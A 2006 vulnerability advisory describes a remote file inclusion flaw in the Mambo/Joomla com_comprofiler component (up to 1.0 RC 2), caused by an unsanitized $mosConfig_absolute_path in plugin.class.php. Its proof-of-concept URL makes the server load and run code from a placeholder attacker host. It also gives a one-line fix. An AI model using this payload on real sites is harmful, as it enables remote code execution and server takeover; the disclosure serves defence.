Mambo/Joomla com_comprofiler Components <== v1.0 RC 2 Multiple Remote File Include Vulnerabilities
---------------------------------------------------------------------------
Mambo/Joomla com_comprofiler Components <== v1.0 RC 2 Multiple Remote File
Include Vulnerabilities
---------------------------------------------------------------------------
Author : Matdhule
Date : August, 25th 2006
Location : Indonesia, Jakarta
Critical Lvl : Highly critical
Impact : System access
Where : From Remote
---------------------------------------------------------------------------
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
com_comprofiler Components
Application : com_comprofiler
version : 1.0 RC 2
---------------------------------------------------------------------------
Vulnerability:
~~~~~~~~~~~~~~~
in folder com_comprofiler we found vulnerability script plugin.class.php
-----------------------plugin.class.php----------------------
<?php
/**
* Plugin handler
* @package Joomla
* @author various, JoomlaJoe and Beat
*/
require_once( $mosConfig_absolute_path .
'/includes/domit/xml_domit_lite_include.php' );
----------------------------------------------------------
Variables $mosConfig_absolute_path are not properly sanitized.
Proof Of Concept:
~~~~~~~~~~~~~~~~
http://[target]/[path]/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=
http://attacker.com/evil.txt?
Solution:
~~~~~~~~
sanitize variabel $mosConfig_absolute_path in plugin.class.php
---------------------------------------------------------------------------
Shoutz:
~~~~~~
~ solpot a.k.a chris, J4mbi H4ck3r for the hacking lesson :)
~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,anonymous
~ bius, lapets, ghoz, t4mbun_hacker, NpR, h4ntu, thama
~ newbie_hacker@xxxxxxxxxxxxxxx, jasakom_perjuangan@xxxxxxxxxxxxxxx
~ #nyubi (solpotcrew comunity) #jambihackerlink #e-c-h-o @ irc.dal.net
---------------------------------------------------------------------------
Contact:
~~~~~~~
matdhule[at]gmail[dot]com
-------------------------------- [ EOF ] ----------------------------------